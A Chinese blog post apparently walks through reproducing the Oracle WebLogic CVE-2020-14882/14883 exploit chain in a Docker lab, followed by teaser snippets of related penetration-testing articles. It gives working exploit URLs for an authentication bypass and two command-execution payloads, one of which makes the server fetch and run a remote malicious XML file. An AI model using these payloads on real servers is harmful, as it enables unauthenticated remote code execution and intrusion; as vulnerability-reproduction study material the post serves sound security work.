摘要:将的动态功能和标准的安全性引入大型网络应用的开发集成部署和管理之中。使用这两个漏洞组成的利用链,可通过一个请求在远程服务器上以未授权的任意用户身份执行命令。这个漏洞的利用方式有两种,一是通过,二是通过。
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
在2020年10月的更新中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882和CVE-2020-14883,CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。
Oracle WebLogic Server 版本10.3.6.0
Oracle WebLogic Server 版本12.1.3.0
Oracle WebLogic Server 版本12.2.1.3
Oracle WebLogic Server 版本12.2.1.4
Oracle WebLogic Server 版本14.1.1.0
目标可访问;目标版本符合;未打相应补丁。
Weblogic 12.2.1.3
构造特殊url,绕过认证登录后台和执行系统命令
启动docker
启动镜像:
docker-compose up -d
启动完成后,kali访问http://your-ip:7001/console即可查看到后台登录页面
环境搭建完成
漏洞复现
绕过认证直接访问后台
首先测试权限绕过漏洞(CVE-2020-14882),直接访问
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
成功登录到后台页面
虽然成功登录到后台页面但当前用户是低权限用户,并不能执行命令此时需要用到第二个漏洞CVE-2020-14883。这个漏洞的利用方式有两种,一是通过com.tangosol.coherence.mvel2.sh.ShellSession,二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext。
直接访问如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec("touch%20/tmp/success1");")
页面显示404,回到服务器端执行如下命令登录到容器里面
docker exec -i -t 容器id /bin/bash
进入容器后到执行命令的目录下查看文件夹是否创建
可以看到success1成功创建,命令执行成功
这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。
com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext是一种更为通用的方法,最早在CVE-2019-2725被提出,对于所有Weblogic版本均有效。
首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,这里我将它放在了一台win7虚拟机phpsturd的网站主目录下
文件内容如下
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
然后通过如下URL,即可让Weblogic加载这个XML,并执行其中的命令:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://your-www/rce.xml")
依旧显示404页面,进容器里面看看命令是否执行
Success2文件夹被创建,命令执行成功,虽然这个方法能适用于更多版本,但需要Weblogic的服务器能够访问到恶意XML。
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/120768.html
摘要:在当前页面抓包后修改内容,写入冰蝎脚本文件。添加的内容为实现反弹。影响范围相关漏洞有复现过程环境这里先使用扫描一下是否开启了服务。使用工具写入。 目录 简介Web...
摘要:安全研究员于上周四检测到名为的恶意软件,该恶意软件利用多个漏洞攻击系统和多个应用程序。软件系统的安全漏洞成为网络犯罪分子发动攻击的辅助工具。 .markdown-body{word-break:break-word;line-height:1.75;font-weight:400;font-size:15px;overflow-x:hidden;color:#333}.markdown-b...
摘要:一服务类弱口令漏洞利用可以上传包上传慢速攻击文件包含漏洞后台弱口令后台部署包反序列化远程代码执行后台弱口令任意文件泄露反序列化后台弱口令后台部署包测试页面上传反序列化暴力 ...
摘要:渗透攻击渗透攻击是指有攻击者或渗透测试者利用一个系统应用或服务中的安全漏洞,所进行的攻击行为。是指在渗透攻击时作为攻击载荷运行的一组机器指令。 域 将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫做域,域是组织与存储资源的核心管理单元,在域中,至少有一台域控制器...
摘要:环境搭建服务器外网内网域内机器内网内网域内服务器内网域控机器内网点击查看技术资料多本网络安全系列电子书网络安全标准题库资料项目源码网络安全基础入门安全攻防方面的视频网络安全学习路线图外网渗透端口扫描搭建好环境,对目标进 ...
阅读 3176·2023-04-25 22:04
阅读 2050·2021-11-22 15:29
阅读 1838·2021-10-11 10:57
阅读 1175·2021-09-24 09:48
阅读 2877·2021-09-23 11:20
阅读 2961·2021-09-09 09:34
阅读 2333·2021-09-02 15:21
阅读 2198·2019-08-30 15:53
